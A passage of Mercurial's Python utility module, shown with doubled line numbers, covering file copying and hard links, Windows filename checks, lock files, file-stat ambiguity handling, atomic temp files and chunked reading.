1733 1733 def log2(x):
1734 1734 if not x:
1735 1735 return 0
1736 1736 i = 0
1737 1737 while x:
1738 1738 x >>= 1
1739 1739 i += 1
1740 1740 return i - 1
1741 1741
1742 1742 buf = []
1743 1743 blen = 0
1744 1744 for chunk in source:
1745 1745 buf.append(chunk)
1746 1746 blen += len(chunk)
1747 1747 if blen >= min:
1748 1748 if min < max:
1749 1749 min = min << 1
1750 1750 nmin = 1 << log2(blen)
1751 1751 if nmin > min:
1752 1752 min = nmin
1753 1753 if min > max:
1754 1754 min = max
1755 1755 yield b''.join(buf)
1756 1756 blen = 0
1757 1757 buf = []
1758 1758 if buf:
1759 1759 yield b''.join(buf)
1760 1760
1761 1761
1762 1762 def always(fn):
1763 1763 return True
1764 1764
1765 1765
1766 1766 def never(fn):
1767 1767 return False
1768 1768
1769 1769
1770 1770 def nogc(func):
1771 1771 """disable garbage collector
1772 1772
1773 1773 Python's garbage collector triggers a GC each time a certain number of
1774 1774 container objects (the number being defined by gc.get_threshold()) are
1775 1775 allocated even when marked not to be tracked by the collector. Tracking has
1776 1776 no effect on when GCs are triggered, only on what objects the GC looks
1777 1777 into. As a workaround, disable GC while building complex (huge)
1778 1778 containers.
1779 1779
1780 1780 This garbage collector issue have been fixed in 2.7. But it still affect
1781 1781 CPython's performance.
1782 1782 """
1783 1783
1784 1784 def wrapper(*args, **kwargs):
1785 1785 gcenabled = gc.isenabled()
1786 1786 gc.disable()
1787 1787 try:
1788 1788 return func(*args, **kwargs)
1789 1789 finally:
1790 1790 if gcenabled:
1791 1791 gc.enable()
1792 1792
1793 1793 return wrapper
1794 1794
1795 1795
1796 1796 if pycompat.ispypy:
1797 1797 # PyPy runs slower with gc disabled
1798 1798 nogc = lambda x: x
1799 1799
1800 1800
1801 1801 def pathto(root, n1, n2):
1802 1802 '''return the relative path from one place to another.
1803 1803 root should use os.sep to separate directories
1804 1804 n1 should use os.sep to separate directories
1805 1805 n2 should use "/" to separate directories
1806 1806 returns an os.sep-separated path.
1807 1807
1808 1808 If n1 is a relative path, it's assumed it's
1809 1809 relative to root.
1810 1810 n2 should always be relative to root.
1811 1811 '''
1812 1812 if not n1:
1813 1813 return localpath(n2)
1814 1814 if os.path.isabs(n1):
1815 1815 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1816 1816 return os.path.join(root, localpath(n2))
1817 1817 n2 = b'/'.join((pconvert(root), n2))
1818 1818 a, b = splitpath(n1), n2.split(b'/')
1819 1819 a.reverse()
1820 1820 b.reverse()
1821 1821 while a and b and a[-1] == b[-1]:
1822 1822 a.pop()
1823 1823 b.pop()
1824 1824 b.reverse()
1825 1825 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1826 1826
1827 1827
1828 1828 # the location of data files matching the source code
1829 1829 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != b'macosx_app':
1830 1830 # executable version (py2exe) doesn't support __file__
1831 1831 datapath = os.path.dirname(pycompat.sysexecutable)
1832 1832 else:
1833 1833 datapath = os.path.dirname(pycompat.fsencode(__file__))
1834 1834
1835 1835 i18n.setdatapath(datapath)
1836 1836
1837 1837
1838 1838 def checksignature(func):
1839 1839 '''wrap a function with code to check for calling errors'''
1840 1840
1841 1841 def check(*args, **kwargs):
1842 1842 try:
1843 1843 return func(*args, **kwargs)
1844 1844 except TypeError:
1845 1845 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1846 1846 raise error.SignatureError
1847 1847 raise
1848 1848
1849 1849 return check
1850 1850
1851 1851
1852 1852 # a whilelist of known filesystems where hardlink works reliably
1853 1853 _hardlinkfswhitelist = {
1854 1854 b'apfs',
1855 1855 b'btrfs',
1856 1856 b'ext2',
1857 1857 b'ext3',
1858 1858 b'ext4',
1859 1859 b'hfs',
1860 1860 b'jfs',
1861 1861 b'NTFS',
1862 1862 b'reiserfs',
1863 1863 b'tmpfs',
1864 1864 b'ufs',
1865 1865 b'xfs',
1866 1866 b'zfs',
1867 1867 }
1868 1868
1869 1869
1870 1870 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1871 1871 '''copy a file, preserving mode and optionally other stat info like
1872 1872 atime/mtime
1873 1873
1874 1874 checkambig argument is used with filestat, and is useful only if
1875 1875 destination file is guarded by any lock (e.g. repo.lock or
1876 1876 repo.wlock).
1877 1877
1878 1878 copystat and checkambig should be exclusive.
1879 1879 '''
1880 1880 assert not (copystat and checkambig)
1881 1881 oldstat = None
1882 1882 if os.path.lexists(dest):
1883 1883 if checkambig:
1884 1884 oldstat = checkambig and filestat.frompath(dest)
1885 1885 unlink(dest)
1886 1886 if hardlink:
1887 1887 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1888 1888 # unless we are confident that dest is on a whitelisted filesystem.
1889 1889 try:
1890 1890 fstype = getfstype(os.path.dirname(dest))
1891 1891 except OSError:
1892 1892 fstype = None
1893 1893 if fstype not in _hardlinkfswhitelist:
1894 1894 hardlink = False
1895 1895 if hardlink:
1896 1896 try:
1897 1897 oslink(src, dest)
1898 1898 return
1899 1899 except (IOError, OSError):
1900 1900 pass # fall back to normal copy
1901 1901 if os.path.islink(src):
1902 1902 os.symlink(os.readlink(src), dest)
1903 1903 # copytime is ignored for symlinks, but in general copytime isn't needed
1904 1904 # for them anyway
1905 1905 else:
1906 1906 try:
1907 1907 shutil.copyfile(src, dest)
1908 1908 if copystat:
1909 1909 # copystat also copies mode
1910 1910 shutil.copystat(src, dest)
1911 1911 else:
1912 1912 shutil.copymode(src, dest)
1913 1913 if oldstat and oldstat.stat:
1914 1914 newstat = filestat.frompath(dest)
1915 1915 if newstat.isambig(oldstat):
1916 1916 # stat of copied file is ambiguous to original one
1917 1917 advanced = (
1918 1918 oldstat.stat[stat.ST_MTIME] + 1
1919 1919 ) & 0x7FFFFFFF
1920 1920 os.utime(dest, (advanced, advanced))
1921 1921 except shutil.Error as inst:
1922 1922 raise error.Abort(str(inst))
1923 1923
1924 1924
1925 1925 def copyfiles(src, dst, hardlink=None, progress=None):
1926 1926 """Copy a directory tree using hardlinks if possible."""
1927 1927 num = 0
1928 1928
1929 1929 def settopic():
1930 1930 if progress:
1931 1931 progress.topic = _(b'linking') if hardlink else _(b'copying')
1932 1932
1933 1933 if os.path.isdir(src):
1934 1934 if hardlink is None:
1935 1935 hardlink = (
1936 1936 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1937 1937 )
1938 1938 settopic()
1939 1939 os.mkdir(dst)
1940 1940 for name, kind in listdir(src):
1941 1941 srcname = os.path.join(src, name)
1942 1942 dstname = os.path.join(dst, name)
1943 1943 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1944 1944 num += n
1945 1945 else:
1946 1946 if hardlink is None:
1947 1947 hardlink = (
1948 1948 os.stat(os.path.dirname(src)).st_dev
1949 1949 == os.stat(os.path.dirname(dst)).st_dev
1950 1950 )
1951 1951 settopic()
1952 1952
1953 1953 if hardlink:
1954 1954 try:
1955 1955 oslink(src, dst)
1956 1956 except (IOError, OSError):
1957 1957 hardlink = False
1958 1958 shutil.copy(src, dst)
1959 1959 else:
1960 1960 shutil.copy(src, dst)
1961 1961 num += 1
1962 1962 if progress:
1963 1963 progress.increment()
1964 1964
1965 1965 return hardlink, num
1966 1966
1967 1967
1968 1968 _winreservednames = {
1969 1969 b'con',
1970 1970 b'prn',
1971 1971 b'aux',
1972 1972 b'nul',
1973 1973 b'com1',
1974 1974 b'com2',
1975 1975 b'com3',
1976 1976 b'com4',
1977 1977 b'com5',
1978 1978 b'com6',
1979 1979 b'com7',
1980 1980 b'com8',
1981 1981 b'com9',
1982 1982 b'lpt1',
1983 1983 b'lpt2',
1984 1984 b'lpt3',
1985 1985 b'lpt4',
1986 1986 b'lpt5',
1987 1987 b'lpt6',
1988 1988 b'lpt7',
1989 1989 b'lpt8',
1990 1990 b'lpt9',
1991 1991 }
1992 1992 _winreservedchars = b':*?"<>|'
1993 1993
1994 1994
1995 1995 def checkwinfilename(path):
1996 1996 r'''Check that the base-relative path is a valid filename on Windows.
1997 1997 Returns None if the path is ok, or a UI string describing the problem.
1998 1998
1999 1999 >>> checkwinfilename(b"just/a/normal/path")
2000 2000 >>> checkwinfilename(b"foo/bar/con.xml")
2001 2001 "filename contains 'con', which is reserved on Windows"
2002 2002 >>> checkwinfilename(b"foo/con.xml/bar")
2003 2003 "filename contains 'con', which is reserved on Windows"
2004 2004 >>> checkwinfilename(b"foo/bar/xml.con")
2005 2005 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2006 2006 "filename contains 'AUX', which is reserved on Windows"
2007 2007 >>> checkwinfilename(b"foo/bar/bla:.txt")
2008 2008 "filename contains ':', which is reserved on Windows"
2009 2009 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2010 2010 "filename contains '\\x07', which is invalid on Windows"
2011 2011 >>> checkwinfilename(b"foo/bar/bla ")
2012 2012 "filename ends with ' ', which is not allowed on Windows"
2013 2013 >>> checkwinfilename(b"../bar")
2014 2014 >>> checkwinfilename(b"foo\\")
2015 2015 "filename ends with '\\', which is invalid on Windows"
2016 2016 >>> checkwinfilename(b"foo\\/bar")
2017 2017 "directory name ends with '\\', which is invalid on Windows"
2018 2018 '''
2019 2019 if path.endswith(b'\\'):
2020 2020 return _(b"filename ends with '\\', which is invalid on Windows")
2021 2021 if b'\\/' in path:
2022 2022 return _(b"directory name ends with '\\', which is invalid on Windows")
2023 2023 for n in path.replace(b'\\', b'/').split(b'/'):
2024 2024 if not n:
2025 2025 continue
2026 2026 for c in _filenamebytestr(n):
2027 2027 if c in _winreservedchars:
2028 2028 return (
2029 2029 _(
2030 2030 b"filename contains '%s', which is reserved "
2031 2031 b"on Windows"
2032 2032 )
2033 2033 % c
2034 2034 )
2035 2035 if ord(c) <= 31:
2036 2036 return _(
2037 2037 b"filename contains '%s', which is invalid on Windows"
2038 2038 ) % stringutil.escapestr(c)
2039 2039 base = n.split(b'.')[0]
2040 2040 if base and base.lower() in _winreservednames:
2041 2041 return (
2042 2042 _(b"filename contains '%s', which is reserved on Windows")
2043 2043 % base
2044 2044 )
2045 2045 t = n[-1:]
2046 2046 if t in b'. ' and n not in b'..':
2047 2047 return (
2048 2048 _(
2049 2049 b"filename ends with '%s', which is not allowed "
2050 2050 b"on Windows"
2051 2051 )
2052 2052 % t
2053 2053 )
2054 2054
2055 2055
2056 2056 if pycompat.iswindows:
2057 2057 checkosfilename = checkwinfilename
2058 2058 timer = time.clock
2059 2059 else:
2060 2060 checkosfilename = platform.checkosfilename
2061 2061 timer = time.time
2062 2062
2063 2063 if safehasattr(time, "perf_counter"):
2064 2064 timer = time.perf_counter
2065 2065
2066 2066
2067 2067 def makelock(info, pathname):
2068 2068 """Create a lock file atomically if possible
2069 2069
2070 2070 This may leave a stale lock file if symlink isn't supported and signal
2071 2071 interrupt is enabled.
2072 2072 """
2073 2073 try:
2074 2074 return os.symlink(info, pathname)
2075 2075 except OSError as why:
2076 2076 if why.errno == errno.EEXIST:
2077 2077 raise
2078 2078 except AttributeError: # no symlink in os
2079 2079 pass
2080 2080
2081 2081 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2082 2082 ld = os.open(pathname, flags)
2083 2083 os.write(ld, info)
2084 2084 os.close(ld)
2085 2085
2086 2086
2087 2087 def readlock(pathname):
2088 2088 try:
2089 2089 return readlink(pathname)
2090 2090 except OSError as why:
2091 2091 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2092 2092 raise
2093 2093 except AttributeError: # no symlink in os
2094 2094 pass
2095 2095 with posixfile(pathname, b'rb') as fp:
2096 2096 return fp.read()
2097 2097
2098 2098
2099 2099 def fstat(fp):
2100 2100 '''stat file object that may not have fileno method.'''
2101 2101 try:
2102 2102 return os.fstat(fp.fileno())
2103 2103 except AttributeError:
2104 2104 return os.stat(fp.name)
2105 2105
2106 2106
2107 2107 # File system features
2108 2108
2109 2109
2110 2110 def fscasesensitive(path):
2111 2111 """
2112 2112 Return true if the given path is on a case-sensitive filesystem
2113 2113
2114 2114 Requires a path (like /foo/.hg) ending with a foldable final
2115 2115 directory component.
2116 2116 """
2117 2117 s1 = os.lstat(path)
2118 2118 d, b = os.path.split(path)
2119 2119 b2 = b.upper()
2120 2120 if b == b2:
2121 2121 b2 = b.lower()
2122 2122 if b == b2:
2123 2123 return True # no evidence against case sensitivity
2124 2124 p2 = os.path.join(d, b2)
2125 2125 try:
2126 2126 s2 = os.lstat(p2)
2127 2127 if s2 == s1:
2128 2128 return False
2129 2129 return True
2130 2130 except OSError:
2131 2131 return True
2132 2132
2133 2133
2134 2134 try:
2135 2135 import re2
2136 2136
2137 2137 _re2 = None
2138 2138 except ImportError:
2139 2139 _re2 = False
2140 2140
2141 2141
2142 2142 class _re(object):
2143 2143 def _checkre2(self):
2144 2144 global _re2
2145 2145 try:
2146 2146 # check if match works, see issue3964
2147 2147 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2148 2148 except ImportError:
2149 2149 _re2 = False
2150 2150
2151 2151 def compile(self, pat, flags=0):
2152 2152 '''Compile a regular expression, using re2 if possible
2153 2153
2154 2154 For best performance, use only re2-compatible regexp features. The
2155 2155 only flags from the re module that are re2-compatible are
2156 2156 IGNORECASE and MULTILINE.'''
2157 2157 if _re2 is None:
2158 2158 self._checkre2()
2159 2159 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2160 2160 if flags & remod.IGNORECASE:
2161 2161 pat = b'(?i)' + pat
2162 2162 if flags & remod.MULTILINE:
2163 2163 pat = b'(?m)' + pat
2164 2164 try:
2165 2165 return re2.compile(pat)
2166 2166 except re2.error:
2167 2167 pass
2168 2168 return remod.compile(pat, flags)
2169 2169
2170 2170 @propertycache
2171 2171 def escape(self):
2172 2172 '''Return the version of escape corresponding to self.compile.
2173 2173
2174 2174 This is imperfect because whether re2 or re is used for a particular
2175 2175 function depends on the flags, etc, but it's the best we can do.
2176 2176 '''
2177 2177 global _re2
2178 2178 if _re2 is None:
2179 2179 self._checkre2()
2180 2180 if _re2:
2181 2181 return re2.escape
2182 2182 else:
2183 2183 return remod.escape
2184 2184
2185 2185
2186 2186 re = _re()
2187 2187
2188 2188 _fspathcache = {}
2189 2189
2190 2190
2191 2191 def fspath(name, root):
2192 2192 '''Get name in the case stored in the filesystem
2193 2193
2194 2194 The name should be relative to root, and be normcase-ed for efficiency.
2195 2195
2196 2196 Note that this function is unnecessary, and should not be
2197 2197 called, for case-sensitive filesystems (simply because it's expensive).
2198 2198
2199 2199 The root should be normcase-ed, too.
2200 2200 '''
2201 2201
2202 2202 def _makefspathcacheentry(dir):
2203 2203 return dict((normcase(n), n) for n in os.listdir(dir))
2204 2204
2205 2205 seps = pycompat.ossep
2206 2206 if pycompat.osaltsep:
2207 2207 seps = seps + pycompat.osaltsep
2208 2208 # Protect backslashes. This gets silly very quickly.
2209 2209 seps.replace(b'\\', b'\\\\')
2210 2210 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2211 2211 dir = os.path.normpath(root)
2212 2212 result = []
2213 2213 for part, sep in pattern.findall(name):
2214 2214 if sep:
2215 2215 result.append(sep)
2216 2216 continue
2217 2217
2218 2218 if dir not in _fspathcache:
2219 2219 _fspathcache[dir] = _makefspathcacheentry(dir)
2220 2220 contents = _fspathcache[dir]
2221 2221
2222 2222 found = contents.get(part)
2223 2223 if not found:
2224 2224 # retry "once per directory" per "dirstate.walk" which
2225 2225 # may take place for each patches of "hg qpush", for example
2226 2226 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2227 2227 found = contents.get(part)
2228 2228
2229 2229 result.append(found or part)
2230 2230 dir = os.path.join(dir, part)
2231 2231
2232 2232 return b''.join(result)
2233 2233
2234 2234
2235 2235 def checknlink(testfile):
2236 2236 '''check whether hardlink count reporting works properly'''
2237 2237
2238 2238 # testfile may be open, so we need a separate file for checking to
2239 2239 # work around issue2543 (or testfile may get lost on Samba shares)
2240 2240 f1, f2, fp = None, None, None
2241 2241 try:
2242 2242 fd, f1 = pycompat.mkstemp(
2243 2243 prefix=b'.%s-' % os.path.basename(testfile),
2244 2244 suffix=b'1~',
2245 2245 dir=os.path.dirname(testfile),
2246 2246 )
2247 2247 os.close(fd)
2248 2248 f2 = b'%s2~' % f1[:-2]
2249 2249
2250 2250 oslink(f1, f2)
2251 2251 # nlinks() may behave differently for files on Windows shares if
2252 2252 # the file is open.
2253 2253 fp = posixfile(f2)
2254 2254 return nlinks(f2) > 1
2255 2255 except OSError:
2256 2256 return False
2257 2257 finally:
2258 2258 if fp is not None:
2259 2259 fp.close()
2260 2260 for f in (f1, f2):
2261 2261 try:
2262 2262 if f is not None:
2263 2263 os.unlink(f)
2264 2264 except OSError:
2265 2265 pass
2266 2266
2267 2267
2268 2268 def endswithsep(path):
2269 2269 '''Check path ends with os.sep or os.altsep.'''
2270 2270 return (
2271 2271 path.endswith(pycompat.ossep)
2272 2272 or pycompat.osaltsep
2273 2273 and path.endswith(pycompat.osaltsep)
2274 2274 )
2275 2275
2276 2276
2277 2277 def splitpath(path):
2278 2278 '''Split path by os.sep.
2279 2279 Note that this function does not use os.altsep because this is
2280 2280 an alternative of simple "xxx.split(os.sep)".
2281 2281 It is recommended to use os.path.normpath() before using this
2282 2282 function if need.'''
2283 2283 return path.split(pycompat.ossep)
2284 2284
2285 2285
2286 2286 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2287 2287 """Create a temporary file with the same contents from name
2288 2288
2289 2289 The permission bits are copied from the original file.
2290 2290
2291 2291 If the temporary file is going to be truncated immediately, you
2292 2292 can use emptyok=True as an optimization.
2293 2293
2294 2294 Returns the name of the temporary file.
2295 2295 """
2296 2296 d, fn = os.path.split(name)
2297 2297 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2298 2298 os.close(fd)
2299 2299 # Temporary files are created with mode 0600, which is usually not
2300 2300 # what we want. If the original file already exists, just copy
2301 2301 # its mode. Otherwise, manually obey umask.
2302 2302 copymode(name, temp, createmode, enforcewritable)
2303 2303
2304 2304 if emptyok:
2305 2305 return temp
2306 2306 try:
2307 2307 try:
2308 2308 ifp = posixfile(name, b"rb")
2309 2309 except IOError as inst:
2310 2310 if inst.errno == errno.ENOENT:
2311 2311 return temp
2312 2312 if not getattr(inst, 'filename', None):
2313 2313 inst.filename = name
2314 2314 raise
2315 2315 ofp = posixfile(temp, b"wb")
2316 2316 for chunk in filechunkiter(ifp):
2317 2317 ofp.write(chunk)
2318 2318 ifp.close()
2319 2319 ofp.close()
2320 2320 except: # re-raises
2321 2321 try:
2322 2322 os.unlink(temp)
2323 2323 except OSError:
2324 2324 pass
2325 2325 raise
2326 2326 return temp
2327 2327
2328 2328
2329 2329 class filestat(object):
2330 2330 """help to exactly detect change of a file
2331 2331
2332 2332 'stat' attribute is result of 'os.stat()' if specified 'path'
2333 2333 exists. Otherwise, it is None. This can avoid preparative
2334 2334 'exists()' examination on client side of this class.
2335 2335 """
2336 2336
2337 2337 def __init__(self, stat):
2338 2338 self.stat = stat
2339 2339
2340 2340 @classmethod
2341 2341 def frompath(cls, path):
2342 2342 try:
2343 2343 stat = os.stat(path)
2344 2344 except OSError as err:
2345 2345 if err.errno != errno.ENOENT:
2346 2346 raise
2347 2347 stat = None
2348 2348 return cls(stat)
2349 2349
2350 2350 @classmethod
2351 2351 def fromfp(cls, fp):
2352 2352 stat = os.fstat(fp.fileno())
2353 2353 return cls(stat)
2354 2354
2355 2355 __hash__ = object.__hash__
2356 2356
2357 2357 def __eq__(self, old):
2358 2358 try:
2359 2359 # if ambiguity between stat of new and old file is
2360 2360 # avoided, comparison of size, ctime and mtime is enough
2361 2361 # to exactly detect change of a file regardless of platform
2362 2362 return (
2363 2363 self.stat.st_size == old.stat.st_size
2364 2364 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2365 2365 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2366 2366 )
2367 2367 except AttributeError:
2368 2368 pass
2369 2369 try:
2370 2370 return self.stat is None and old.stat is None
2371 2371 except AttributeError:
2372 2372 return False
2373 2373
2374 2374 def isambig(self, old):
2375 2375 """Examine whether new (= self) stat is ambiguous against old one
2376 2376
2377 2377 "S[N]" below means stat of a file at N-th change:
2378 2378
2379 2379 - S[n-1].ctime < S[n].ctime: can detect change of a file
2380 2380 - S[n-1].ctime == S[n].ctime
2381 2381 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2382 2382 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2383 2383 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2384 2384 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2385 2385
2386 2386 Case (*2) above means that a file was changed twice or more at
2387 2387 same time in sec (= S[n-1].ctime), and comparison of timestamp
2388 2388 is ambiguous.
2389 2389
2390 2390 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2391 2391 timestamp is ambiguous".
2392 2392
2393 2393 But advancing mtime only in case (*2) doesn't work as
2394 2394 expected, because naturally advanced S[n].mtime in case (*1)
2395 2395 might be equal to manually advanced S[n-1 or earlier].mtime.
2396 2396
2397 2397 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2398 2398 treated as ambiguous regardless of mtime, to avoid overlooking
2399 2399 by confliction between such mtime.
2400 2400
2401 2401 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2402 2402 S[n].mtime", even if size of a file isn't changed.
2403 2403 """
2404 2404 try:
2405 2405 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2406 2406 except AttributeError:
2407 2407 return False
2408 2408
2409 2409 def avoidambig(self, path, old):
2410 2410 """Change file stat of specified path to avoid ambiguity
2411 2411
2412 2412 'old' should be previous filestat of 'path'.
2413 2413
2414 2414 This skips avoiding ambiguity, if a process doesn't have
2415 2415 appropriate privileges for 'path'. This returns False in this
2416 2416 case.
2417 2417
2418 2418 Otherwise, this returns True, as "ambiguity is avoided".
2419 2419 """
2420 2420 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2421 2421 try:
2422 2422 os.utime(path, (advanced, advanced))
2423 2423 except OSError as inst:
2424 2424 if inst.errno == errno.EPERM:
2425 2425 # utime() on the file created by another user causes EPERM,
2426 2426 # if a process doesn't have appropriate privileges
2427 2427 return False
2428 2428 raise
2429 2429 return True
2430 2430
2431 2431 def __ne__(self, other):
2432 2432 return not self == other
2433 2433
2434 2434
2435 2435 class atomictempfile(object):
2436 2436 '''writable file object that atomically updates a file
2437 2437
2438 2438 All writes will go to a temporary copy of the original file. Call
2439 2439 close() when you are done writing, and atomictempfile will rename
2440 2440 the temporary copy to the original name, making the changes
2441 2441 visible. If the object is destroyed without being closed, all your
2442 2442 writes are discarded.
2443 2443
2444 2444 checkambig argument of constructor is used with filestat, and is
2445 2445 useful only if target file is guarded by any lock (e.g. repo.lock
2446 2446 or repo.wlock).
2447 2447 '''
2448 2448
2449 2449 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2450 2450 self.__name = name # permanent name
2451 2451 self._tempname = mktempcopy(
2452 2452 name,
2453 2453 emptyok=(b'w' in mode),
2454 2454 createmode=createmode,
2455 2455 enforcewritable=(b'w' in mode),
2456 2456 )
2457 2457
2458 2458 self._fp = posixfile(self._tempname, mode)
2459 2459 self._checkambig = checkambig
2460 2460
2461 2461 # delegated methods
2462 2462 self.read = self._fp.read
2463 2463 self.write = self._fp.write
2464 2464 self.seek = self._fp.seek
2465 2465 self.tell = self._fp.tell
2466 2466 self.fileno = self._fp.fileno
2467 2467
2468 2468 def close(self):
2469 2469 if not self._fp.closed:
2470 2470 self._fp.close()
2471 2471 filename = localpath(self.__name)
2472 2472 oldstat = self._checkambig and filestat.frompath(filename)
2473 2473 if oldstat and oldstat.stat:
2474 2474 rename(self._tempname, filename)
2475 2475 newstat = filestat.frompath(filename)
2476 2476 if newstat.isambig(oldstat):
2477 2477 # stat of changed file is ambiguous to original one
2478 2478 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2479 2479 os.utime(filename, (advanced, advanced))
2480 2480 else:
2481 2481 rename(self._tempname, filename)
2482 2482
2483 2483 def discard(self):
2484 2484 if not self._fp.closed:
2485 2485 try:
2486 2486 os.unlink(self._tempname)
2487 2487 except OSError:
2488 2488 pass
2489 2489 self._fp.close()
2490 2490
2491 2491 def __del__(self):
2492 2492 if safehasattr(self, '_fp'): # constructor actually did something
2493 2493 self.discard()
2494 2494
2495 2495 def __enter__(self):
2496 2496 return self
2497 2497
2498 2498 def __exit__(self, exctype, excvalue, traceback):
2499 2499 if exctype is not None:
2500 2500 self.discard()
2501 2501 else:
2502 2502 self.close()
2503 2503
2504 2504
2505 2505 def unlinkpath(f, ignoremissing=False, rmdir=True):
2506 2506 """unlink and remove the directory if it is empty"""
2507 2507 if ignoremissing:
2508 2508 tryunlink(f)
2509 2509 else:
2510 2510 unlink(f)
2511 2511 if rmdir:
2512 2512 # try removing directories that might now be empty
2513 2513 try:
2514 2514 removedirs(os.path.dirname(f))
2515 2515 except OSError:
2516 2516 pass
2517 2517
2518 2518
2519 2519 def tryunlink(f):
2520 2520 """Attempt to remove a file, ignoring ENOENT errors."""
2521 2521 try:
2522 2522 unlink(f)
2523 2523 except OSError as e:
2524 2524 if e.errno != errno.ENOENT:
2525 2525 raise
2526 2526
2527 2527
2528 2528 def makedirs(name, mode=None, notindexed=False):
2529 2529 """recursive directory creation with parent mode inheritance
2530 2530
2531 2531 Newly created directories are marked as "not to be indexed by
2532 2532 the content indexing service", if ``notindexed`` is specified
2533 2533 for "write" mode access.
2534 2534 """
2535 2535 try:
2536 2536 makedir(name, notindexed)
2537 2537 except OSError as err:
2538 2538 if err.errno == errno.EEXIST:
2539 2539 return
2540 2540 if err.errno != errno.ENOENT or not name:
2541 2541 raise
2542 2542 parent = os.path.dirname(os.path.abspath(name))
2543 2543 if parent == name:
2544 2544 raise
2545 2545 makedirs(parent, mode, notindexed)
2546 2546 try:
2547 2547 makedir(name, notindexed)
2548 2548 except OSError as err:
2549 2549 # Catch EEXIST to handle races
2550 2550 if err.errno == errno.EEXIST:
2551 2551 return
2552 2552 raise
2553 2553 if mode is not None:
2554 2554 os.chmod(name, mode)
2555 2555
2556 2556
2557 2557 def readfile(path):
2558 2558 with open(path, b'rb') as fp:
2559 2559 return fp.read()
2560 2560
2561 2561
2562 2562 def writefile(path, text):
2563 2563 with open(path, b'wb') as fp:
2564 2564 fp.write(text)
2565 2565
2566 2566
2567 2567 def appendfile(path, text):
2568 2568 with open(path, b'ab') as fp:
2569 2569 fp.write(text)
2570 2570
2571 2571
2572 2572 class chunkbuffer(object):
2573 2573 """Allow arbitrary sized chunks of data to be efficiently read from an
2574 2574 iterator over chunks of arbitrary size."""
2575 2575
2576 2576 def __init__(self, in_iter):
2577 2577 """in_iter is the iterator that's iterating over the input chunks."""
2578 2578
2579 2579 def splitbig(chunks):
2580 2580 for chunk in chunks:
2581 2581 if len(chunk) > 2 ** 20:
2582 2582 pos = 0
2583 2583 while pos < len(chunk):
2584 2584 end = pos + 2 ** 18
2585 2585 yield chunk[pos:end]
2586 2586 pos = end
2587 2587 else:
2588 2588 yield chunk
2589 2589
2590 2590 self.iter = splitbig(in_iter)
2591 2591 self._queue = collections.deque()
2592 2592 self._chunkoffset = 0
2593 2593
2594 2594 def read(self, l=None):
2595 2595 """Read L bytes of data from the iterator of chunks of data.
2596 2596 Returns less than L bytes if the iterator runs dry.
2597 2597
2598 2598 If size parameter is omitted, read everything"""
2599 2599 if l is None:
2600 2600 return b''.join(self.iter)
2601 2601
2602 2602 left = l
2603 2603 buf = []
2604 2604 queue = self._queue
2605 2605 while left > 0:
2606 2606 # refill the queue
2607 2607 if not queue:
2608 2608 target = 2 ** 18
2609 2609 for chunk in self.iter:
2610 2610 queue.append(chunk)
2611 2611 target -= len(chunk)
2612 2612 if target <= 0:
2613 2613 break
2614 2614 if not queue:
2615 2615 break
2616 2616
2617 2617 # The easy way to do this would be to queue.popleft(), modify the
2618 2618 # chunk (if necessary), then queue.appendleft(). However, for cases
2619 2619 # where we read partial chunk content, this incurs 2 dequeue
2620 2620 # mutations and creates a new str for the remaining chunk in the
2621 2621 # queue. Our code below avoids this overhead.
2622 2622
2623 2623 chunk = queue[0]
2624 2624 chunkl = len(chunk)
2625 2625 offset = self._chunkoffset
2626 2626
2627 2627 # Use full chunk.
2628 2628 if offset == 0 and left >= chunkl:
2629 2629 left -= chunkl
2630 2630 queue.popleft()
2631 2631 buf.append(chunk)
2632 2632 # self._chunkoffset remains at 0.
2633 2633 continue
2634 2634
2635 2635 chunkremaining = chunkl - offset
2636 2636
2637 2637 # Use all of unconsumed part of chunk.
2638 2638 if left >= chunkremaining:
2639 2639 left -= chunkremaining
2640 2640 queue.popleft()
2641 2641 # offset == 0 is enabled by block above, so this won't merely
2642 2642 # copy via ``chunk[0:]``.
2643 2643 buf.append(chunk[offset:])
2644 2644 self._chunkoffset = 0
2645 2645
2646 2646 # Partial chunk needed.
2647 2647 else:
2648 2648 buf.append(chunk[offset : offset + left])
2649 2649 self._chunkoffset += left
2650 2650 left -= chunkremaining
2651 2651
2652 2652 return b''.join(buf)
2653 2653
2654 2654
2655 2655 def filechunkiter(f, size=131072, limit=None):
2656 2656 """Create a generator that produces the data in the file size
2657 2657 (default 131072) bytes at a time, up to optional limit (default is
2658 2658 to read all data). Chunks may be less than size bytes if the
2659 2659 chunk is the last chunk in the file, or the file is a socket or
2660 2660 some other type of file that sometimes reads less data than is
2661 2661 requested."""
